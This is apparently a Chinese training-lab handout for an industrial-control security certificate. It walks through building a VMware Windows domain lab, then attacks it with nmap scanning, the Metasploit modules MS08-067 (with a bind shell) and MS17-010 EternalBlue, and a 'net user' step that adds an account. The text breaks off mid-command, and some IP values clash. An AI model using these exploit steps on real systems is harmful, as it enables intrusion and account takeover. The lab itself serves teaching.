工控安全职业证书技能实践：内网横向渗透测试与实战.docxVIP

PAGE 17 PAGE 1 GKAQZYZSJNSJ-028内网横向渗透测试与实战课程级别 信息安全专业工业互联网安全方向 实验概述 首先在VMware通过新建虚拟机的方式，使用系统镜像文件，安装好WinServer2008和Win7，以及win2000sever，都按照推荐或默认的配置来就好，网络适配器选择仅主机模式（我们要创建一个局域网样的环境，在这个局域网里搭建域），并装好VMware tools。这是一般用于渗透测试所需要搭建好的的环境，我们所搭建的域控为winsever2008，域成员服务器为2000sever和win7sever，我们利用win2000sever的ms08067漏洞去打win2000sever，获取win2000sever控制权，然后假定kali已经进入内网，即获得某一主机的控制权，再利用ms17010获得win7控制权。 实验目标 拿到最终主机win7的shell，最终实现得到主机控制权 预备知识 熟悉Linux cpdmp工具的使用 熟悉防火墙的配置命令 建议课时数 4个课时 实验环境准备 实验时硬件环境：单核CPU、2G内存、30G硬盘 需要能够支持系统连接网络的网络环境 系统 ：win7 sp1 win2000sever（(域成员服务器） winsever 2008 R2 sp1（域控服务器） 攻击机 实验步骤 任务一 在VMware中搭建虚拟局域网 1在MSDN下载好上述系统版本 MSDN, 我告诉你 - 做一个安静的工具站 () 2设置win7和win sever2008的连接方式为仅主机模式 2首先配置server的IP，如下图所示。由于该server用作域控服务器，所以DNS写为该server的IP，记得关闭防火墙 3设置win7的IP，如下图所示，因为要将该虚拟机加入域，所以其DNS也要设置为该域的域控服务器的IP，也要关闭win7的防火墙。 4给sever的管理员设置密码 5然后点击左下角的服务器管理器图标，然后点击 角色→添加角色，服务器角色选择为Active Directory域服务，按照顺序点击下一步完成角色设置。 6设置完角色之后重新进入服务器管理器，依次点击 Active Directory域服务→运行Active Directory域服务安装向导。 7在向导中点击下一步，在新林中新建域，填写一个域名，选择windows server 2008 r2，输入Administrator的密码。然后按照默认路径，接着server将重启，重启后将server的DNS设置为server的静态IP，如果在win7 上ping 成功就说明创建成功。 8然后将win7加入该域中。右键计算机→属性→系统属性→更改，然后填写域，点击确定 9同理对win2000 sever进行如下配置 9.1将win2000的连接方式设为仅主机模式 9.2将win200的ip设置为静态ip，并将DNS设置为0 9.3在我的电脑的属性里面加入这个域 任务二 拿到域名成员控制权 1使用nmap去扫描在这个局域网的所有主机 nmap -T4 -sC -sV 1 这是对ip为1的域名主机的扫描 这是对ip为10的机子的扫描 这是对ip为10的机子的扫描 2发现ip为13的主机是win2000 sever，ip为11的机子是win sever2008，很有可能就是域控，我们使用ms08067打进去 通过msf利用ms08067打0 打开msf msconsole 使用攻击模块 msf6 use exploit/windows/smb/ms08_067_netapi 设定攻击地址攻击 设置使用的shellcode msf6 exploit(windows/smb/ms08_067_netapi) set payload windows/shell_bind_tcp 攻击 Exploit 截图所示界面即表示成功渗透进入到win 2000 sever里面了 创建用户q1@Wq1@W net user q1@Wq1@W 1@Wq1@W \add 任务三 利用ms17_010获取win7用户账户密码。 首先在虚拟机里面网络模式都必须调成NAT模式 此时假定kali已经进入内网，获得ip号32 而内网主机win7是6 按如下设置输入 msf6 exploit(windows/smb/ms17_010_eternalblue) set RHOST 37 RHOST = 38 msf6 exploit(windows/smb/ms17_010_eternalblue) set LHOST 32 LHOST = 32 msf6 exploit(windows/smb/